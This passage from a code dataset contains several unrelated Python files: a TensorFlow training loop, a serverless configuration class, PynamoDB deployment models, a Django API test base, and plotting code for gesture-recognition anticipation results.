calc_loss(logits_for_train, tftrain_labels)\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n solver = optimizer.minimize(loss)\n \n \nwith tf.name_scope('train_summary'):\n \n tf.summary.scalar(\"Cross_Entropy\", loss, collections=['train'])\n merged_summary_train = tf.summary.merge_all('train') \n\n\n \n \nmodel_path = '/media/ubuntu/65db2e03-ffde-4f3d-8f33-55d73836211a/ts_case_project/model/cnn_reader/'\ncheckpoint_dir = os.path.join(model_path, 'model')\ncheckpoint_filename = os.path.join(checkpoint_dir, 'cnn_reader_v1.ckpt')\nlogfile = os.path.join(model_path, 'log')\n\n\niteration = 46000\ncontinue_training = 1\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.9\n\ninit_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n\nwith tf.Session(config=config) as sess:\n \n summary_writer = tf.summary.FileWriter(logfile, sess.graph)\n saver = tf.train.Saver()\n sess.run(init_op) \n \n if continue_training !=0:\n saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir))\n continue_training = 0\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord) \n \n try:\n while not coord.should_stop():\n \n iteration = iteration + 1\n print(\"Iteration:{}\".format(iteration))\n \n s = time.clock()\n feed_dict = {learning_rate:1e-4, keep_prob:0.5, is_training:True}\n sess.run(solver, feed_dict=feed_dict)\n e = time.clock()\n\n print(\"Train time\", e-s)\n \n if iteration%200 == 0: #Train summary\n \n train_loss, train_sum = sess.run([loss, merged_summary_train], feed_dict=feed_dict)\n print(\"Train Loss:{}\".format(train_loss))\n summary_writer.add_summary(train_sum, iteration)\n saver.save(sess, checkpoint_filename, global_step=iteration)\n \n\n \n except tf.errors.OutOfRangeError:\n print('Done training -- epoch limit reached')\n finally:\n coord.request_stop()\n\n \ncoord.request_stop()\ncoord.join(threads) \nsummary_writer.close()\nsess.close() \n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"ts_case_model/CNN_encode/train_cnnreader_v2.py","file_name":"train_cnnreader_v2.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"308480749","text":"import logging\n\nfrom pathlib import Path\n\nfrom cirrus.cli.constants import (\n DEFAULT_CONFIG_FILENAME,\n SERVERLESS_PLUGINS,\n)\nfrom cirrus.cli.exceptions import ConfigError\nfrom cirrus.cli.utils.yaml import NamedYamlable\n\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_CONFIG_PATH = Path(__file__).parent.joinpath('default.yml')\n\n\nclass Config(NamedYamlable):\n @classmethod\n def default(cls):\n return cls.from_file(DEFAULT_CONFIG_PATH)\n\n @classmethod\n def from_project(cls, project):\n return cls.from_file(\n project.path.joinpath(DEFAULT_CONFIG_FILENAME),\n )\n\n def validate(self) -> None:\n # set defaults\n self.functions = {}\n self.stepFunctions = dict(validate=True, stateMachines={})\n self.resources = dict(\n Description='Cirrus STAC Processing Framework',\n Resources={},\n Outputs={},\n )\n\n # populate required plugin list\n try:\n self.plugins.extend(SERVERLESS_PLUGINS.keys())\n except AttributeError:\n self.plugins = list(SERVERLESS_PLUGINS.keys())\n else:\n # deduplicate\n self.plugins = list(set(self.plugins))\n\n def build(self, collections):\n # add all components and resources\n copy = self.copy()\n for collection in collections:\n copy.register(collection)\n return copy\n\n def register(self, collection) -> None:\n from cirrus.cli.components.base import Lambda, StepFunction\n from cirrus.cli.resources import Resource, Output\n if issubclass(collection, Lambda):\n self.register_lambda_collection(collection)\n elif issubclass(collection, StepFunction):\n self.register_step_function_collection(collection)\n elif issubclass(collection, Resource):\n self.resources.Resources = {e.name: e.definition for e in collection.values()}\n elif issubclass(collection, Output):\n self.resources.Outputs = {e.name: e.definition for e in collection.values()}\n else:\n raise ConfigError(\n f\"Unable to register collection '{collection.name}': unknown type '{collection.type}'\",\n )\n\n def register_lambda_collection(self, lambda_collection) -> None:\n for lambda_component in lambda_collection.values():\n self.register_lambda(lambda_component)\n\n def register_lambda(self, lambda_component) -> None:\n if not lambda_component.lambda_enabled:\n logging.debug(\n \"Skipping disabled lambda: '%s'\",\n lambda_component.display_name,\n )\n return\n\n if lambda_component.name in self.functions and not lambda_component.is_core_component:\n logging.warning(\n \"Duplicate lambda declaration: '%s', skipping\",\n lambda_component.display_name,\n )\n return\n\n self.functions[lambda_component.name] = lambda_component.lambda_config\n\n def register_step_function_collection(self, sf_collection) -> None:\n for sf_component in sf_collection.values():\n self.register_step_function(sf_component)\n\n def register_step_function(self, sf_component) -> None:\n if sf_component.name in self.stepFunctions.stateMachines and not sf_component.is_core_component:\n logging.warning(\n f\"Duplicate step function declaration '{sf_component.display_name}', skipping\",\n )\n return\n self.stepFunctions.stateMachines[sf_component.name] = sf_component.config\n","sub_path":"cirrus/cli/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"23456400","text":"from pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute\nfrom pynamodb.attributes import NumberAttribute\nfrom pynamodb.attributes import BooleanAttribute\nfrom pynamodb.attributes import JSONAttribute\nimport json\n\n\ndef set_aws_host(aws_host):\n DeploymentModel.Meta.host = aws_host\n\n\ndef set_aws_region(aws_region):\n DeploymentModel.Meta.region = aws_region\n\n\nclass OrderedJsonAttribute(JSONAttribute):\n \"\"\"\n An override of the JsonAttribute type to ensure the dumps are ordered by keys\n This matters given we're using JsonAttributes as a range key\n \"\"\"\n def serialize(self, value):\n\n \"\"\"\n Serializes JSON to unicode\n \"\"\"\n if value is None:\n return None\n encoded = json.dumps(value, sort_keys=True)\n try:\n return unicode(encoded)\n except NameError:\n return encoded\n\n\nclass DeploymentModel(Model):\n class Meta:\n table_name = 'GroundControlDeployment'\n\n service = UnicodeAttribute(hash_key=True)\n range_keys = OrderedJsonAttribute(range_key=True)\n cluster = UnicodeAttribute()\n version = UnicodeAttribute()\n project = UnicodeAttribute(default=\"unknown\")\n deployment_id = UnicodeAttribute()\n desired_count = NumberAttribute(default=0)\n running_count = NumberAttribute(default=0)\n task_definition = UnicodeAttribute()\n active = BooleanAttribute(default=True)\n status = UnicodeAttribute(default=\"SCALING\")\n loadbalancer_config = OrderedJsonAttribute(null=True)\n\n @classmethod\n def from_dict(cls, data):\n return cls(\n range_keys={\n \"cluster\": data['cluster'],\n \"version\": data['version'],\n },\n **data\n )\n\n def as_dict(self):\n return {\n \"deployment_id\": self.deployment_id,\n \"project\": self.project,\n \"service\": self.service,\n \"version\": self.version,\n \"cluster\": self.cluster,\n \"task_definition\": self.task_definition,\n \"loadbalancer_config\": self.loadbalancer_config,\n \"desired_count\": self.desired_count,\n \"running_count\": self.running_count,\n \"status\": self.status\n }\n","sub_path":"groundcontrol/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"9167579","text":"import json\nimport requests\nfrom django.test.testcases import TestCase\nimport os\nfrom integration.core.constants import AfterbuyUrls\n\n\nclass AfterBuyResourceTestCase(TestCase):\n\n def setUp(self):\n self.base_version = 'http://{0}/afterbuy/v1/'.format(os.environ.get('SERVER_NAME',\n 'local.api.afterbuy.co:8000'))\n\n def assertSuccess(self, first, msg=None):\n if int(first) < 200 or int(first) > 299:\n raise self.failureException(msg)\n\n def login(self, dct=None):\n if dct is None:\n dct = {\"phone_number\": \"9999999999\", \"password\": \"afterbuy\"}\n resp = requests.post(self.base_version+AfterbuyUrls.LOGIN, data=json.dumps(dct),\n headers={'content_type': 'application/json'})\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)['access_token']\n\n def post(self, uri, content_type='application/json', data=None,\n headers={'content_type': 'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.post(self.base_version+uri, data=json.dumps(data), headers=headers)\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)\n\n def get(self, uri, content_type='application/json',\n headers={'content_type':'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.get(self.base_version+uri, headers=headers, params=params)\n self.assertSuccess(resp.status_code)\n return json.loads(resp.content)\n\n def delete(self, uri, content_type='application/json',\n headers={'content_type':'application/json'}, params={}):\n headers.update({'access_token': self.login()})\n resp = requests.delete(self.base_version+uri, headers=headers, params=params)\n self.assertSuccess(resp.status_code)\n","sub_path":"tests/smoke/afterbuy/base_integration.py","file_name":"base_integration.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511124454","text":"import sys\nimport numpy as np \nimport matplotlib.pyplot as plt \nimport matplotlib as mpl\nimport matplotlib.font_manager as font_manager\nfrom scipy.io import loadmat\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom itertools import product\nimport pickle\nimport pims\nimport cv2\nimport matplotlib as mpl\n# from context import draw_ballpose, draw_bodypose, draw_class, draw_hand_center, draw_handpose, draw_head\n#mpl.use('Agg')\nmpl.style.use(\"seaborn\")\n\ndef plot_probabilities(probs,pred, label):\n plt.plot(probs)\n plt.legend(['act {}'.format(i) for i in range(1,13)], loc='upper right')\n plt.title(\"Label = {} / Predicted = {}\".format(label+1,pred+1))\n\n#def plot_conf_matrix(predictions, labels): pass\n\ndef anticipate(probabilities, th = 0.9, uncert = True):\n if uncert:\n _,_,mi= calc_uncertainties(probabilities)\n if mi < th: return (True, probabilities.mean(0).argmax(),probabilities.mean(0).max(),mi)\n return (False, -1, probabilities.mean(0).max(), mi)\n else: \n if probabilities.max() > th:\n return (True, probabilities.argmax(),probabilities.max(), 0)\n return (False, -1, 0, probabilities.max())\n\n\n\n\ndef generate_video():\n stochastic = pickle.load(open(\"results/mc_dropout.pkl\", 'rb'), encoding=\"bytes\")\n deterministic = pickle.load(open(\"results/prediction_m_g_b.pkl\", 'rb'), encoding=\"bytes\")\n stochastic.sort(key = lambda d:d[b'interval'][0])\n deterministic.sort(key = lambda d:d[b'interval'][0])\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('selected.avi',fourcc, 15.0, (1280,480))\n chosen = [2988, 6155,1476, 2096, 6394, 30,74, 6210, 1562, 2178, 1108,6442, 6499,8686,9152, 13919, 10228]\n\n actions = {\n 1: \"Pedido de ajuda\",\n 2: \"Venha aqui\",\n 3: \"Pode sair\",\n 4: \"Siga-me\",\n 5: \"Pare\",\n 6: \"Abortar missão\",\n 7: \"Bom\",\n 8: \"Não\",\n 9: \"Ruim\",\n 10:\"Dar passagem\",\n 11:\"Apontar\",\n 12:\"Dúvida\",\n 13:\"Mais alto\",\n 14:\"Mais baixo\",\n 15:\"Silêncio\",\n } \n\n # actions = {\n # 1:\"Ask\",\n # 2:\"Come_Here\",\n # 3:\"Leave\",\n # 4:\"Follow\",\n # 5:\"Stop\",\n # 6:\"Abort\",\n # 7:\"Good\",\n # 8:\"No\",\n # 9:\"Bad\",\n # 10:\"Give_way\",\n # 11:\"Pointing\",\n # 12:\"Doubt\",\n # 13:\"Louder\",\n # 14:\"Quieter\",\n # 15:\"Be_quiet\"\n # }\n\n\n\n\n colors = [\"green\", \"black\", \"red\", \"blue\", \"brown\", \"indigo\",\"coral\",\"lime\",\"orangered\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkorange\",\"deepskyblue\"]\n font = font_manager.FontProperties(weight='normal',\n style='normal', size=10)\n font_act = font_manager.FontProperties(weight='bold',\n style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n frame_count = -1\n for det, stoc in zip(deterministic, stochastic):\n label = stoc[b'label']\n det_prob = det[b'probs']\n stoc_prob = stoc[b'probs']\n begin,end= stoc[b'interval']\n if begin not in chosen: continue\n mean = stoc_prob.mean(1)\n std = stoc_prob.std(1)\n std_up = np.clip(mean+std,0.0,1.0)\n std_down = np.clip(mean-std,0.0,1.0)\n indexes = np.arange(len(mean))\n lines=[]\n print(indexes.shape,std_up.shape,std_down.shape)\n det_ant = -1\n stoc_ant = -1\n act_s = -1\n act_s = -1\n frame_count = begin-1\n \n\n for i in range(len(mean)):\n frame_count += 1\n fig, axis = plt.subplots(2,1,facecolor=(0.8, 0.8, 0.8))\n axis[0].set_xlim([0,len(det_prob)])\n axis[1].set_xlim([0,len(stoc_prob)])\n axis[0].set_ylim([0.0,1.0])\n axis[1].set_ylim([0.0,1.0])\n axis[0].set_xlabel(\"Frame\", weight=\"bold\")\n axis[1].set_xlabel(\"Frame\", weight=\"bold\")\n axis[0].set_ylabel(\"Probability\", weight=\"bold\")\n axis[1].set_ylabel(\"Probability\", weight=\"bold\")\n plt.subplots_adjust(hspace=1.2)\n axis[1].plot([0,len(det_prob)],[0.9,0.9],linestyle='-',color=\"b\", linewidth=1) \n fig.suptitle(\"Action {} - ({})\".format(label+1,actions[label+1]), fontsize=15, weight=\"bold\")\n\n for v in range(12): \n line, = axis[0].plot(mean[:i,v], color=colors[v])\n axis[0].fill_between(indexes[:i],std_up[:i,v], std_down[:i,v], alpha=0.3, facecolor=colors[v])\n axis[1].plot(det_prob[:i,v], color=colors[v])\n if len(lines) < len(colors):lines.append(line)\n if det_ant == -1:\n ant_d,act_d,prob_d,_ = anticipate(det_prob[i],0.9,False)\n if stoc_ant == -1:\n ant_s,act_s, prob_s, uncertainty = anticipate(stoc_prob[i],0.5,True)\n else: _,_, _, uncertainty = anticipate(stoc_prob[i],0.5,True)\n \n \n if ant_s or stoc_ant> -1:\n if stoc_ant == -1:\n stoc_ant = i\n plot_anticipation(axis[0], prob_s, stoc_ant)\n tx,ty = [2, 0.83] if stoc_ant>0.5 else [stoc_ant+3,0.83]\n axis[0].text(2,0.75 , \" Act. {} at Frame {}\".format(act_s+1,stoc_ant+1),fontproperties = font_act, bbox = box)\n if act_s == label:\n axis[0].text(2,0.75 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis[0].text(2,0.75 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n \n if ant_d or det_ant>-1:\n if det_ant == -1:det_ant = i\n plot_anticipation(axis[1], prob_d, det_ant)\n tx,ty = [2, 0.83] if det_ant>0.5 else [det_ant+3,0.83]\n axis[1].text(2,0.75 , \" Act. {} at Frame {}\".format(act_d+1,det_ant+1),fontproperties = font_act, bbox = box)\n if act_d == label:\n axis[1].text(2,0.75 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis[1].text(2,0.75 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n \n axis[0].set_title(\"Stochastic Model - Uncertainty = {:.2f}\".format(uncertainty), weight=\"bold\")\n axis[1].set_title(\"Deterministic Model\", weight=\"bold\")\n\n\n fig.legend(lines, [\"{} - {}\".format(i,actions[i]) for i in range(1,len(colors)+1)], loc='center', \\\n prop = font, ncol = 4, shadow=True, frameon=True, fancybox=True)\n\n frame = framesw[frame_count]\n # plt.legend(['act {}'.format(i) for i in range(1,probs.shape[1]+1)], loc='upper right')\n # #print(entropy(probs[i]))\n fig.canvas.draw()\n img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img_plot = cv2.resize(img, (640, 480))\n image = np.concatenate((img_plot,frame),axis=1)\n out.write(image[:,:,[2,1,0]])\n # cv2.imshow(\"Action Dataset\",image[:,:,[2,1,0]])\n # cv2.waitKey(10)\n plt.close()\n \n\n\n\n\n\ndef plot_anticipation(axis, acc,frame):\n axis.plot([0,frame],[acc,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([frame,frame],[0,acc],linestyle='--',color=\"k\", linewidth=1)\n \n\n\n\n\ndef show_video(frames, probs,probs_u, begin,end):\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('test_{}.avi'.format(int(begin)),fourcc, 5.0, (1280,480))\n \n #labels_body = np.load(\"labels_body.npy\").astype(int)\n fig, axis = plt.subplots(2,1,facecolor=(0.6843, 0.9098, 0.9098))\n axis[0].set_xlim([0,len(probs)])\n axis[1].set_xlim([0,len(probs)])\n axis[0].set_ylim([0.0,1.0])\n axis[1].set_ylim([0.0,1.0])\n axis[0].set_xlabel(\"Frame\")\n axis[1].set_xlabel(\"Frame\")\n axis[0].set_ylabel(\"Probability\")\n axis[1].set_ylabel(\"Probability\")\n\n draw_hand = True\n draw_body = True\n draw_ball = True\n draw_gaze = True\n\n _,_,mi = calc_uncertainties(probs_u)\n meanst = probs_u.mean(1)\n std = probs_u.std(1)\n y1 = np.clip(meanst-std,0.0,1.0)\n y2 = np.clip(meanst+std,0.0,1.0)\n\n empty = False\n empty_image = (np.ones((480,640,3))*127).astype(np.uint8) \n framesw = pims.Video(\"./dataset/world.mp4\")\n labels = np.load(\"labels_complete_cut.npy\").astype(int) \n #cv2.imshow(\"Action Dataset\",empty_image)\n labels = labels[begin:end]\n colors = [\"green\", \"black\", \"red\", \"blue\", \"brown\", \"indigo\",\"coral\",\"lime\",\"orangered\",\"yellow\", \"navy\",\"salmon\"]\n indexes = np.arange(len(meanst))\n\n for i, label in enumerate(labels):\n \n # convert canvas to image\n \n frame = frames[label[0]]\n cv2.imwrite('start.png',frame[:,:,[2,1,0]])\n \n ball = label[2:4]\n body = label[4:40].reshape((18,2)).astype(int)\n hand = label[40:44].reshape((2,2)).astype(int)\n\n\n frame = empty_image #if empty else frame\n frame = draw_bodypose(frame,body) if draw_body else frame\n frame = draw_head(frame,body) if draw_gaze else frame\n frame = draw_hand_center(frame,hand) if draw_hand else frame\n frame = draw_ballpose(frame,ball.astype(int)) if draw_ball else frame\n cv2.imwrite('skeleton.png',frame[:,:,[2,1,0]])\n #frame = draw_class(frame, label[1])\n\n\n\n # for j in range(probs.shape[1]):\n # axis[0].plot(probs[:i,j], color = colors[j])\n # axis[1].plot(meanst[:i,j], color=colors[j])\n # axis[1].fill_between(indexes[:i],y1[:i,j], y2[:i,j],alpha=0.1, facecolor=colors[j])\n # plt.legend(['act {}'.format(i) for i in range(1,probs.shape[1]+1)], loc='upper right')\n # #print(entropy(probs[i]))\n # fig.canvas.draw()\n\n # img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8,sep='')\n # img = img.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n # #img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n # img_plot = cv2.resize(img, (640, 480))\n \n\n # image = np.concatenate((img_plot,frame),axis=1)\n #out.write(image[:,:,[2,1,0]])\n cv2.imshow(\"Action Dataset\",frame[:,:,[2,1,0]])\n k = cv2.waitKey(3000)\n if k == 27:break\n if k == 98:draw_ball = not draw_ball #B\n if k == 103:draw_gaze = not draw_gaze #G\n if k == 101:empty = not empty #E\n if k == 104:draw_hand = not draw_hand #H\n if k == 106:draw_body = not draw_body #J\n if k == 32: \n while cv2.waitKey(30) != 32:continue\n plt.close()\n out.release()\n\n\ndef plot_all_charts():\n #\n #titles = [\"$DLSTM_{12m}$ (Movement)\", \"$DLSTM_{12h}$ (Head)\",\"$DLSTM_{12o}$ (Object)\",\"$DLSTM_{12mh}$ (Movement + Head)\", \"$DLSTM_{12mo}$ (Movement + Object)\",\"$DLSTM_{12mho}$ (Movement+Head+Object)\"]\n titles = [\"$DLSTM_{12m}$ \", \"$DLSTM_{12h}$ \",\"$DLSTM_{12o}$ \",\"$DLSTM_{12mh}$ \", \"$DLSTM_{12mo}$ \",\"$DLSTM_{12mho}$ \"]\n \n colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\",\"coral\",\"lime\",\"orange\",\"yellow\", \"navy\",\"salmon\",\"gray\",\"darkgray\",\"darkorange\"]\n \n #titles = [\"Movement\", \"Head\",\"Movement + Head\"]\n #colors = [\"green\", \"black\", \"blue\", \"red\",\"brown\", \"indigo\"]\n\n actions = {\n 1: \"Pedido de ajuda\",\n 2: \"Venha aqui\",\n 3: \"Pode sair\",\n 4: \"Siga-me\",\n 5: \"Pare\",\n 6: \"Abortar missão\",\n 7: \"Bom\",\n 8: \"Não\",\n 9: \"Ruim\",\n 10:\"Dar passagem\",\n 11:\"Apontar\",\n 12:\"Dúvida\",\n 13:\"Mais alto\",\n 14:\"Mais baixo\",\n 15:\"Silêncio\",\n } \n \n\n videos= pickle.load(open(\"prediction_gesture3_0_91.16.pkl\", 'rb'), encoding=\"bytes\")\n\n\n font_act = font_manager.FontProperties(weight='bold',\n style='normal', size=10)\n box = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n for video in videos:\n \n fig, axis = plt.subplots(1,1, figsize=(18, 10))\n \n fig.subplots_adjust(hspace=0.77, left = 0.04, right = 0.99, bottom = 0.1,top=0.9)\n lines = []\n \n axis.set_ylim(0.0,1.0)\n axis.set_xlabel(\"Observation Ratio\", fontsize=14)\n axis.set_ylabel(\"Probability\", fontsize=14)\n #a.tick_params(labelsize=6)\n for tick in axis.xaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n for tick in axis.yaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n \n\n \n begin,end = video['interval']\n probs = video['probs'].mean(1)\n label = video['label']\n pred = video['pred']\n print(probs.shape)\n p = np.amax(probs, axis= 1)\n c = np.argmax(probs, axis= 1)\n x = np.argmax(p>=0.9, axis=0)\n print(x)\n y = p[x]\n a = c[x]\n \n #ratio = len(probs)/100.0\n #probs = np.array([probs[int(i*ratio)] for i in range(100)])\n #observation = [i/100.0 for i in range(100)]\n total = len(probs)\n print(total)\n x = x/float(total)\n observation = [i / float(total) for i in range(total)]\n #axs[i].set_xlim(0,len(probs))\n for cl, color in enumerate(colors):\n line = axis.plot(observation, probs[:,cl], color = color)\n if len(lines) < len(colors):lines.append(line)\n #axis.legend([l for l in range(1,13)], loc='upper right',fontsize = 4, prop = {'weight':'bold'})\n \n line_k = axis.plot([x,x,],[0,y],linestyle='--',color=\"k\", linewidth=3)\n axis.plot([0,x,],[y,y],linestyle='--',color=\"k\", linewidth=3)\n axis.plot(x, y, color='green', linestyle='dashed', marker='o', markerfacecolor='k', markersize=10)\n \n if y >= 0.9:\n tx,ty = [0.02, 0.83] if x>0.5 else [x+0.03,0.83]\n axis.text(0.2,0.55 , \" Act. {} with {}% of Frames\".format(a+1,round(x*100)),fontproperties = font_act, bbox = box)\n if a == label:\n axis.text(0.2,0.55 , \"V\",bbox = box, fontproperties = font_act,color = \"g\")\n else:\n axis.text(0.2,0.55 , \"X\",bbox = box, fontproperties = font_act,color = \"r\")\n else:\n axis.plot([0,1.0,],[0.9,0.9],linestyle='--',color=\"k\", linewidth=3)\n axis.text(0.2,0.55 , \"It was not possible to anticipate\", bbox = box,fontproperties = font_act,color = \"r\")\n \n\n axis.set_title(\"{} - Recognized({})\".format(titles[i],pred+1), weight=\"normal\")\n \n \n fig.suptitle('{} - {}'.format(actions[label+1],label+1), fontsize=20, weight=\"normal\")\n \n font = font_manager.FontProperties(weight='normal',\n style='normal', size=13)\n legend = fig.legend(lines+[line_k], [\"{} - {}\".format(i,actions[i]) for i in range(1,len(colors)+1)]+[\"$p=0.9$\"], loc='center', \\\n prop = font, ncol = 7, shadow=True, frameon=True, fancybox=True)\n #legend.get_frame().set_facecolor((1.0,1.0,1.0))\n \n plt.show()\n return\n plt.savefig('charts/chart_act_({}-{})_{}_{}.png'.format(begin,end,label+1,v))\n plt.close()\n #return\n\ndef plot_uncertainty_threshold():\n\n \n \n # values = pickle.load(open(\"results/prediction_brnn_6441.pkl\", 'rb'), encoding=\"bytes\")\n # values.sort(key = lambda d:d['interval'][0])\n # values_u = values\n \n # for i,(value,value_u) in enumerate(zip(values,values_u)):\n # label = value_u['label']\n # pred = value_u['pred']\n # begin,end = value_u['interval']\n # probs = value['probs']\n # probs_u = value_u['probs']\n # print(begin,end)\n # if label == pred:\n # frames = pims.Video(\"./dataset/external.mp4\")\n # show_video(frames,probs,probs_u,begin,end)\n \n # return\n \n \n \n \n values_u = pickle.load(open(\"prediction_gesture_rt_8040.00.pkl\", 'rb'), encoding=\"bytes\")\n #interval = []\n #pred = []\n #probs = []\n #label = []\n #for value in values_u:\n # interval.append(value['interval'])\n # pred.append(value[b'pred'])\n # probs.append(value[b'probs'])\n # label.append(value[b'label'])\n #values_u = { 'interval':np.array(interval),'pred':np.array(pred),'probs':np.array(probs),'label':np.array(label)}\n # values_u.sort(key = lambda d:d['interval'][0])\n results = []\n for t in range(50):\n predictions = {\"classes\":[], \"labels\":[]} \n t /= 10.0\n corrects = []\n total_frames = []\n corrects_ant = 0\n anticipate = []\n for i,value in enumerate(values_u):\n label = value['label']\n pred = value['pred']\n # begin,end = value['interval']\n probs = value['probs']\n\n vr,h,mi = calc_uncertainties(probs)\n meanst = probs.mean(1)\n std = probs.std(1)\n c = np.argmax(meanst, axis= 1)\n\n x = np.argmax(mi0 and a == label:\n corrects_ant += 1.0\n # else: \n # # print(\"x {}, begin {}, pred {}, label {}\".format(x,begin,a,label))\n # print(begin)\n # if x == 0:a = 0\n\n # predictions[\"labels\"].append(label)\n # predictions[\"classes\"].append(a)\n\n ant = float(x)/len(probs) if x > 0 else 1.0 #len(probs)\n anticipate.append(ant)\n total_frames.append(len(probs))\n\n corrects.append(pred==label)\n # plot_conf_matrix(predictions)\n # return\n acc = corrects_ant/len(corrects)\n m = sum(total_frames)/len(total_frames)\n ant = (sum(anticipate)/len(anticipate))\n results.append([t,acc,ant])\n \n \n results = np.array(results) \n #results[:,2]/=100\n \n acc = results[:,1].max()\n pos = results[:,1].argmax()\n u_acc = results[pos,0]\n acc_frame = results[pos,2]\n \n frame = results[:,2].min()\n pos = results[:,2].argmin()\n u_frame = results[pos,0]\n frame_acc = results[pos,1]\n\n print(acc, frame, u_acc, u_frame)\n fig, axis = plt.subplots(1,1,figsize=(12, 5))\n g,=axis.plot(results[:,0],results[:,1],color = \"g\")\n o, = axis.plot(results[:,0],results[:,2],color = \"orange\")\n k,= axis.plot([u_acc,u_acc],[0,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([0,u_acc],[acc,acc],linestyle='--',color=\"k\", linewidth=1)\n axis.plot([0,u_acc],[acc_frame,acc_frame],linestyle='--',color=\"k\", linewidth=1)\n \n axis.text(u_acc,acc+0.01,\"{:.2f}%\".format(acc*100))\n axis.text(u_frame,frame_acc+0.01,\"{:.2f}%\".format(frame_acc*100))\n\n b,=axis.plot([u_frame,u_frame],[0,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame,frame],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([0,u_frame],[frame_acc,frame_acc],linestyle='-.',color=\"b\", linewidth=1)\n axis.plot([u_frame, u_frame],[frame_acc,frame],linestyle='-.',color=\"b\", linewidth=1)\n \n axis.text(u_acc+0.01, acc_frame+0.01,\"{}% of Frames\".format(int(acc_frame*100)))\n axis.text(u_frame+0.01,frame-0.04,\"{}% of Frames\".format(int(frame*100)))\n\n\n axis.set_xlabel(\"Uncertainty (Mutual Information)\")\n axis.set_ylabel(\"Anticipation Accuracy / Observation Ratio(OR)\")\n axis.legend([g,o,k,b],[\"Anticipation Accuracy\", \"Average OR Anticipation\",\"Maximum Anticipation Accuracy\",\"Minimum Average OR Anticipation\"],loc=\"center right\",framealpha=1, frameon=True, fancybox=True)\n axis.set_title(\"Anticipation vs Uncertainty ($BLSTM_{MC}$)\", weight=\"bold\")\n plt.show()\n\n\n\ndef generate_confusion_matrix( predictions, class_names):\n \n def plot_confusion_matrix(cm, classes,\n normalize=True,\n title='Confusion matrix (%)',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = 100 * cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n print(cm)\n print(accuracy_score(predictions[\"labels\"], predictions[\"classes\"]))\n \n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n # plt.title(title)\n plt.colorbar()\n for acc, c in zip(np.diag(cm),class_names):\n print(\" & {:.2f}\\\\% & \".format(acc))\n \n plt.xticks(list(range(len(class_names))), classes, rotation=90)\n plt.yticks(list(range(len(class_names))), classes)\n\n fmt = '.1f' if normalize else 'd'\n thresh = cm.max() / 2.\n symbol = \"%\" if normalize else \"\"\n for i, j in product(range(cm.shape[0]), range(cm.shape[1])):\n \n if cm[i, j] > 0:\n #if i == j:\n plt.text(j, i, format(cm[i, j], fmt),\n fontsize=12, ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n # plt.ylabel('Real')\n # plt.xlabel('Predicted')\n # Compute confusion matrix\n cnf_matrix = confusion_matrix(predictions[\"labels\"],predictions[\"classes\"])\n np.set_printoptions(precision=2)\n \n\n # # Plot normalized confusion matrix\n plt.figure(figsize=(8,8))\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True,\n # title='Normalized confusion matrix'\n )\n plt.grid(None)\n plt.show()\n # plt.savefig(\"conf_DLSTM_complete.svg\", format=\"svg\")\n \n\ndef plot_conf_matrix(predictions = None):\n if predictions is None:\n values= pickle.load(open(\"./RTGR/prediction_gesture1_72.00.pkl\", 'rb'), encoding=\"bytes\")\n # values= 